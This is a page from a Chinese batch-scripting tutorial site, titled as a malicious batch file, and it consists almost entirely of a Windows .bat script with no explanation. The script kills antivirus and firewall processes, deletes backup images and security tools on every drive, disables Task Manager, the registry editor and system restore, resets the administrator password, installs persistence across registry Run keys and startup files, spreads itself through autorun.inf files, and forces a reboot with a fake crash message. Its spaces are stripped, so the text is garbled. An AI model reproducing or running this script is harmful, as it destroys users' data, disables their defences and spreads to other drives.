恶意批处理.bat_DOS/BAT教程-查字典教程网

@echooff

titleYouDEAD!!!!!!!

settaskkill=s

copy%0%windir%system32cmd.bat

attrib%windir%system32cmd.bat+r+s+h

netstopsharedaccess>nul

%s%/impfw.exeshadowtip.exeshadowservice.exeqq.exeexplorer.exeIEXOLORE.EXE/f>nul

%s%/imnorton*/f>nul

%s%/imav*/f>nul

%s%/imfire*/f>nul

%s%/imanti*/f>nul

%s%/imspy*/f>nul

%s%/imbullguard/f>nul

%s%/imPersFw/f>nul

%s%/imKAV*/f>nul

%s%/imZONEALARM/f>nul

%s%/imSAFEWEB/f>nul

%s%/imOUTPOST/f>nul

%s%/imnv*/f>nul

%s%/imnav*/f>nul

%s%/imF-*/f>nul

%s%/imESAFE/f>nul

%s%/imcle/f>nul

%s%/imBLACKICE/f>nul

%s%/imdef*/f>nul

%s%/im360safe.exe/f>nul

netstopShadow""System""Service

setalldrive=defghijklmnopqrstuvwxyz

for%%ain(c%alldrive%)dodel%%a:360*/f/s/q>nul

for%%ain(c%alldrive%)dodel%%a:修复*/f/s/q>nul

rem修改注册表.......

REGADDHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALL/v

CheckedValue/tREG_DWORD/d00000000/f>nul

REGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer/vNoRun/tREG_DWORD/d

00000001/f>nul

REGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer/vNoRecentDocsMenu/t

REG_DWORD/d00000001/f>nul

REGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer/vNoDrives/tREG_DWORD/d

4294967295/f>nul

REGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem/vDisableregistrytools/t

REG_DWORD/d00000002/f>nul

REGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer/vNoNetHood/tREG_DWORD/d

00000001/f>nul

REGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer/VNoDesktop/tREG_DWORD/d

00000001/f>nul

REGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer/vNoClose/tREG_DWORD/d

00000001/f>nul

REGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer/vNoFind/tREG_DWORD/d

00000001/f>nul

REGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem/vDisableTaskMgr/tREG_DWORD

/d00000001/f>nul

REGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer/vNoLogOff/tREG_DWORD/d

00000001/f>nul

REGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer/vNoSetTaskBar/tREG_DWORD

/d00000001/f>nul

REGADDHKEY_LOCAL_MACHINESoftwareMicrosoftWindows""NTCurrentVersionSystemRestore/vDisableSR/tREG_DWORD/d

00000001/f>nul

REGADDHKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows""NTSystemRestore/vDisableConfig/tREG_DWORD/d

00000001/f>nul

REGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer/vRestrictRun/tREG_DWORD/d

00000001/f>nul

cls

netuseradministrator123456>nul

for%%cin(c%alldrive%)dodel%%c:*.gho/f/s/q>nul

echo@echooff>d:setup.bat

echoshutdown-r-t10-f-c亲爱的朋友，我十分抱歉的通知你，你的电脑已经严重崩溃，请重新安装系统可以解决此问题

!^.^>>d:setup.bat

echocopyd:setup.batc:Documents""and""SettingsAll""Users「开始」菜单程序启动a.bat>>d:setup.bat

echoREGADDHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun/vsetup.bat/tREG_SZ/dd:setup.bat

/f>>d:setup.bat

echoREGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun/vsetup.bat/tREG_SZ/dd:setup.bat

/f>>d:setup.bat

echoREGADDHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce/vsetup.bat/tREG_SZ/dd:setup.bat

/f>>d:setup.bat

HKEY_CLASSES_ROOTbatfileshellopencommand/vsetup.bat/tREG_SZ/dd:setup.bat/f>>d:setup.bat

echo[windows]>>%windir%win.ini

echorun=d:setup.batC:AUTOEXEC.BAT>>%windir%win.ini

echoload=d:setup.batC:AUTOEXEC.BAT>>%windir%win.ini

echo[boot]>>%windir%system.ini

echoshell=explorer.exesetup.batC:AUTOEXEC.BAT>>%windir%system.ini

echo[AutoRun]>d:autorun.inf

echoOpen=setup.bat>>d:autorun.inf

echoOpen=system.bat>>d:autorun.inf

attribd:autorun.inf+r+s+h>>d:setup.bat

attribd:setup.bat+r+s+h>>d:setup.bat

startd:setup.bat/min>nul

echo@echooff>>C:AUTOEXEC.BAT

echoREGADDHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun/vAUTOEXEC.BAT/tREG_SZ/d

C:AUTOEXEC.BAT/f>>C:AUTOEXEC.BAT

echoREGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun/vAUTOEXEC.BAT/tREG_SZ/d

C:AUTOEXEC.BAT/f>>C:AUTOEXEC.BAT

REGADDHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce/vAUTOEXEC.BAT/tREG_SZ/d

C:AUTOEXEC.BAT/f>>C:AUTOEXEC.BAT

echoREGADDHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun/vsetup.bat/tREG_SZ/dd:setup.bat

/f>>C:AUTOEXEC.BAT

echoREGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun/vsetup.bat/tREG_SZ/dd:setup.bat

/f>>C:AUTOEXEC.BAT

REGADDHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce/vsetup.bat/tREG_SZ/dd:setup.bat

/f>>C:AUTOEXEC.BAT

echoifnotd:setup.batstart%windir%system32cmd.bat/min>>C:AUTOEXEC.BAT

copy%0%systemroot%windows.bat>nul

ifnotexist%windir%/system32/explorer.bat@echooff>>%windir%/system32/explorer.bat

ifnotexistC:AUTOEXEC.BATstart%windir%system32cmd.bat/min>>%windir%/system32/explorer.bat

ifnotexist%windir%system32cmd.batstart%systemroot%windows.bat/min>>%windir%/system32/explorer.bat

echoREGADDHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun/vAUTOEXEC.BAT/tREG_SZ/d

C:AUTOEXEC.BAT/f>>%windir%/system32/explorer.bat

echoREGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun/vAUTOEXEC.BAT/tREG_SZ/d

C:AUTOEXEC.BAT/f>>%windir%/system32/explorer.bat

echoREGADDHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun/vsetup.bat/tREG_SZ/dd:setup.bat

/f>>%windir%/system32/explorer.bat

echoREGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun/vsetup.bat/tREG_SZ/dd:setup.bat

/f>>%windir%/system32/explorer.bat

echoREGADDHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun/vexplorer.bat/tREG_SZ/d%

windir%/system32/explorer.bat/f>>%windir%/system32/explorer.bat

echoREGADDHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun/vexplorer.bat/tREG_SZ/d%

windir%/system32/explorer.bat/f>>%windir%/system32/explorer.bat

echostart%systemroot%windows.bat/min>>%windir%/system32/explorer.bat

attrib%windir%/system32/explorer.bat+r+s+h%

attrib%systemroot%/windows.bat+r+s+h

for%%cin(%alldrive%)doecho@echooff>>%%c:system.bat

for%%cin(%alldrive%)doechostart%windir%system32cmd.bat/min>>%%c:system.bat

for%%cin(%alldrive%)doechoattribsystem.bat+r+s+h>>%%c:system.bat

setdrive=efghijklmnopqrstuvwxyz

for%%cin(%drive%)doecho[AuroRun]>%%c:autorun.inf

for%%cin(%drive%)doechoOpen=system.bat>>%%c:autorun.inf

copy%0d:Program""Filesrun.bat

for%%cin(%alldrive%)doechoifnotexist%windir%/system32/explorer.batstartd:Program""Filesrun.bat/min

>>%%c:system.bat

for%%cin(%alldrive%)doattribautorun.inf+r+s+h>>%%c:system.bat

for%%cin(%alldrive%)doattrib%%c:autorun.inf+r+s+h>nul

for%%cin(%alldrive%)doattrib%%c:system.bat+r+s+h>nul

ifnotexist%windir%/system32/explorer.batstartd:Program""Filesrun.bat/min>>d:setup.bat

attribd:Program""Filesrun.bat+r+s+h>nul

del%0

exit